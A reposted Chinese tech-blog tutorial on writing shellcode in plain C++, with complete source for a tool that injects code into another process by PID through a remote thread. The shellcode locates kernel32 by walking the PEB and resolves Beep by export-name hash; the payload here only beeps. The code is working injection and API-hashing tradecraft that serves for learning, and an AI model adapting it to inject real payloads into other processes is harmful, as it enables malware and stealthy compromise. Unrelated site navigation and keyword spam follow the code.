程序博客网 > 淘宝网店如何引流

Writing shellcode in C++

来源:互联网 发布:淘宝网店如何引流 编辑:程序博客网 时间:2024/04/28 18:52

大多数的shellcode是用汇编语言编写。 但是,它是可以写的shellcode在纯C++不使用汇编语言。

下面的程序的shellcode注入到其他进程。 注入的shellcode通过PEB定位KERNEL32。 一旦KERNEL32的基址被发现,将shellcode解析kernel32中的导出表,并计算各d导出表名称的哈希值。并把hash值与Beep函数​​的hash值进行比较。 当hash匹配时,shellcode将从kernel32中的导出表中获得Beep函数的地址。 最后,shellcode调用Beep函数来产生蜂鸣声。该方案还可以转储的shellcode到文件中。

这里是源代码。

#include <stdio.h>#include <Windows.h>#include "ntdll.h"typedef BOOL (WINAPI *pBeep)(DWORD Frequency,DWORD Duration);void WINAPI Code(){PIMAGE_DOS_HEADER pIDH;PIMAGE_NT_HEADERS pINH;PIMAGE_EXPORT_DIRECTORY pIED;ULONG i,Hash;PUCHAR ptr;PULONG Function,Name;PUSHORT Ordinal;PPEB Peb;PLDR_DATA_TABLE_ENTRY Ldr;PVOID Kernel32Base;pBeep fnBeep=NULL;// Get the base address of kernel32Peb=NtCurrentPeb();Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Get the first entry (process executable)Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // Second entry (ntdll)Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink); // kernel32 is located at third entryKernel32Base=Ldr->DllBase;pIDH=(PIMAGE_DOS_HEADER)Kernel32Base;pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Kernel32Base+pIDH->e_lfanew);pIED=(PIMAGE_EXPORT_DIRECTORY)((PUCHAR)Kernel32Base+pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);Function=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfFunctions);Name=(PULONG)((PUCHAR)Kernel32Base+pIED->AddressOfNames);Ordinal=(PUSHORT)((PUCHAR)Kernel32Base+pIED->AddressOfNameOrdinals);for(i=0;i<pIED->NumberOfNames;i++){Hash=0;ptr=(PUCHAR)Kernel32Base+Name[i];// Compute the hashwhile(*ptr)    {    Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);    ptr++;    }if(Hash==0x7586f67c) // Hash of Beep{fnBeep=(pBeep)((PUCHAR)Kernel32Base+Function[Ordinal[i]]); // Get the function addressbreak;}}if(fnBeep){fnBeep(400,10000); // Call the Beep function}}// This is used to calculate the code sizeDWORD WINAPI CodeEnd(){return 0;}int main(int argc,char* argv[]){HANDLE hProcess,hThread,hFile;PVOID mem=NULL;ULONG CodeSize=(ULONG)CodeEnd-(ULONG)Code,size=4096,write;CLIENT_ID cid;OBJECT_ATTRIBUTES oa;NTSTATUS status;BOOLEAN bl;if(argc<3){printf("\nUsage:\n");printf("\ncode /inject [PID]\n");printf("Inject the shellcode into process\n");printf("\ncode /dump [Path]\n");printf("Dump the shellcode into file\n");return -1;}if(!stricmp(argv[1],"/inject")){RtlAdjustPrivilege(20,TRUE,FALSE,&bl); // Enable SeDebugPrivilegecid.UniqueProcess=(HANDLE)atoi(argv[2]);cid.UniqueThread=NULL;InitializeObjectAttributes(&oa,NULL,0,NULL,NULL);status=NtOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oa,&cid);if(!NT_SUCCESS(status)){printf("\nError: Unable to open target process (%#x)\n",status);return -1;}status=NtAllocateVirtualMemory(hProcess,&mem,0,&size,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);if(!NT_SUCCESS(status)){printf("\nError: Unable to allocate memory in target process (%#x)\n",status);NtClose(hProcess);return -1;}printf("\nMemory allocated at %#x\n",mem);printf("\nShellcode size: %u bytes\n",CodeSize);status=NtWriteVirtualMemory(hProcess,mem,Code,CodeSize,NULL);if(!NT_SUCCESS(status)){printf("\nError: Unable to write the shellcode into target process (%#x)\n",status);size=0;NtFreeVirtualMemory(hProcess,&mem,&size,MEM_RELEASE);NtClose(hProcess);return -1;}status=RtlCreateUserThread(hProcess,NULL,FALSE,0,0,0,(PUSER_THREAD_START_ROUTINE)mem,NULL,&hThread,NULL);if(!NT_SUCCESS(status)){printf("\nError: Unable to create remote thread in target process (%#x)\n",status);size=0;NtFreeVirtualMemory(hProcess,&mem,&size,MEM_RELEASE);NtClose(hProcess);return -1;}printf("\nThread created\n");printf("\nWaiting for thread to terminate\n");NtWaitForSingleObject(hThread,FALSE,NULL);printf("\nThread terminated\n");NtClose(hThread);size=0;NtFreeVirtualMemory(hProcess,&mem,&size,MEM_RELEASE);NtClose(hProcess);return 0;}else if(!stricmp(argv[1],"/dump")){hFile=CreateFile(argv[2],GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,0,NULL); // Create the fileif(hFile==INVALID_HANDLE_VALUE){printf("\nError: Unable to create file (%u)\n",GetLastError());return -1;}if(!WriteFile(hFile,Code,CodeSize,&write,NULL)) // Write the shellcode into file{printf("\nError: Unable to write file (%u)\n",GetLastError());NtClose(hFile);return -1;}printf("\nShellcode successfully dumped\n");printf("Shellcode size: %u bytes\n",CodeSize);NtClose(hFile);}else{printf("\nError: Invalid arguments\n");return -1;}return 0;}

0 0
淘宝网店如何引流 淘宝网店如何引流
原创粉丝点击
热门IT博客
mac知网上的文章怎么看mac知网上的文章怎么看
摄像慢镜头软件下载摄像慢镜头软件下载
微创软件北京分公司
python cs框架
中国历年汽车销量数据
linux redis 清除缓存
网站攻击软件
壁纸知乎
单片机应用电路图
p2p ipcamera软件下载
-127的源码
炒股分析软件哪个好
淘宝 发布宝贝的时间
mac git 可视化工具
福建广电网络继续教育
淘宝买手机卡靠谱吗
中国塞尔维亚关系知乎
java统计下载次数
windows xp怎么调亮度
002558巨人网络
热门问题 老师的惩罚 人脸识别 我在镇武司摸鱼那些年 重生之率土为王 我在大康的咸鱼生活 盘龙之生命进化 天生仙种 凡人之先天五行 春回大明朝 姑娘不必设防,我是瞎子 仪器设备 实验室仪器 仪器网 仪器英文 仪器 英文 仪器台 全站仪器 通用仪器 吸黑头仪器有用吗 尚赫仪器害了我一辈子 工程测量仪器 rtk测量仪器使用方法 测控技术与仪器专业 吸黑头仪器有什么危害 测控技术与仪器 南华仪器股吧 网络仪表仪器 化学仪器大全名称图片 化学仪器名称及简图 化学实验仪器 仪器分析第4版课后答案 测黄疸仪器多少钱 教学仪器设备包括哪些 医生仪器闯入紧致律动 项美理疗仪器 仪器仪表行业 测控技术与仪器专业就业方向 gps测量仪器使用方法 按摩仪器哪个牌子好 土地测亩仪器 南华仪器股票 仪器科学与技术 仪器分析课后答案 测量仪器田亩手机下载 理邦仪器股吧 强弓仪器使用方法图片 300206理邦仪器 艾灸仪器好还是点火艾灸好 测控技术与仪器专业就业前景 教学仪器设备器材明细账 天瑞仪器股吧

程序博客网,程序员的互联网技术博客家园。csdn论坛精品 msdn技术资料都在这里